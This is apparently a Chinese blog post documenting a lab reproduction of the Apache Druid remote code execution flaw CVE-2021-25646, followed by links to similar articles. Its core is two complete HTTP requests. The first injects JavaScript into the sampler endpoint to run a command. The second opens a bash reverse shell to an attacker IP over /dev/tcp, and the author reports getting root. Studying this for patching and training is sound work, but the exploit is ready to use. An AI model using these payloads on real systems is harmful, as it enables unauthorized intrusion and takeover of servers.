NextCyber学习记录—Druid代码执行漏洞(CVE-2021-25646)复现

原创 于 2025-07-31 09:23:37 发布 · 274 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #网络安全 #安全 #linux #系统安全 #web安全 #计算机网络

Apache Druid 代码执行漏洞(CVE-2021-25646)

Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞

漏洞复现

启动靶机,访问靶机的8888端口查看Apache Druid主页正常运行
在这里插入图片描述

漏洞利用

利用burp suite进行抓包,抓取后丢入Repeater

在这里插入图片描述

然后直接将以下请求发送即可执行其中的JavaScript代码,记得将ip地址修改为目标主机ip

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 10.22.68.96:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

在这里插入图片描述

如图id命令已被执行

反弹shell

修改数据包,添加如下反弹shell命令,将ip改为攻击机kali的地址,端口为1234

/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/10.132.0.6/1234 0>&1

打开命令行终端,利用nc监听1234端口,bp发送如下请求

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 10.22.68.96:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
              "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/10.132.0.6/1234 0>&1')}",
              "dimension": "added",
              "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

在这里插入图片描述
监听状态下发送请求后反弹shell成功,拿到root权限

该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
地址:nextcyber
请添加图片描述

DreamTree21
关注
druid未授权命令执行漏洞复现(CVE-2021-25646)
尘玥的故事
06-01 1677
由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。druid未授权命令执行漏洞复现(CVE-2021-25646)
Apache RCE漏洞复现 CVE-2021-25646
m0_62284238的博客
09-09 502
Apache Druid 是一种开源的分布式实时分析(OLAP)数据库,能够快速地处理海量的数据,并支持在线聚合和深度查询。Apache Http Server是Apache软件基金会的一个开放源码的网页服务器。Alibaba Druid 是由阿里巴巴开源的一款分布式实时大数据查询和分析系统。进入vulnhub目录下的tomcat目录,进入CVE-2021-25646目录。出现Apache Druid界面即为开启成功!攻击者通过构造数据包中的json串来控制一些敏感参数。whoami执行成功!
CVE-2021-25646:Apache Druid远程代码执行漏洞
就是法老
08-24 2661
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
Apache druid未授权命令执行漏洞复现(CVE-2021-25646)
deng_menglihua的博客
04-19 4544
Apache druid未授权命令执行漏洞复现(CVE-2021-25646) 1.简介 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 2.漏洞概述 编号:CVE-2021-25646(严重) Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 3.影响版本 Apache Druid < 0.20.1 4.环境搭建 ubuntu 1.安装doc
Apache Druid 代码执行漏洞CVE-2021-25646
qq_69775412的博客
03-08 1694
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞
CVE-2021-25646:Apache Druid RCE远程代码执行复现
m0_58596609的博客
12-29 1642
CVE-2021-25646:Apache Druid RCE远程代码执行复现
CVE-2021-25646:Apache Druid远程命令执行漏洞复现
2401_88751665的博客
12-10 925
Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Apache Druid 命令执行漏洞(CVE-2021-25646)复现及排查
dayouzi的博客
08-15 672
Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
CVE-2021-25646
Zx244349115的博客
11-07 262
希望对你有帮助。
Apache Druid 远程代码执行漏洞CVE-2021-25646
bqnagus
09-29 801
描述 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码
Vulhub靶机 Apache DruidCVE-2021-25646)(渗透测试详解)
最新发布
2301_78721909的博客
02-23 595
Vulhub靶机 Apache DruidCVE-2021-25646)(渗透测试详解)
Apache Druid命令执行(CVE-2021-25646
weixin_68177269的博客
09-23 860
Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。但是,在Druid 0.20.0及更早版本中,经过身份验证用户可以构造传入json串来控制某些参数发送恶意的请求,强制Druid为该请求。Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。由于Apache Druid默认情况下缺乏授权认证,攻击者可以利用此漏洞在目标机器上执行任意代码,最终可获取服务器的控制权限。
Apache Druid 代码执行CVE-2021-25646漏洞复现
YJ_12340的博客
05-31 771
Apache Druid是一个高性能的实时分析型数据库,旨在对大型数据集进行快速查询分析。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。主要应用于:点击流分析、网络监测分析、服务指标存储、供应链分析、应用性能指标分析、数字广告分析、商务智能 / OLAP。
每日一漏洞cve-2021-25646
jjjj1029056414的博客
07-27 158
复现漏洞cve-2021-25646(Apache Druid代码执行漏洞
CVE-2021-25646:Apache Druid RCE复现
黑白的博客
05-02 1533
声明 好好学习,天天向上 漏洞描述 Druid不仅是一个数据库连接池,还包含一个ProxyDriver、一系列内置的JDBC组件库、一个SQL Parser。 支持所有JDBC兼容的数据库,包括Oracle、MySql、Derby、Postgresql、SQL Server、H2等。 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的
CVE-2021-25646复现
虚心学习,脚踏实地
05-29 379
CVE-2021-25646复现
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 2195
Apache Druid远程代码执行漏洞(CVE-2021-25646)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值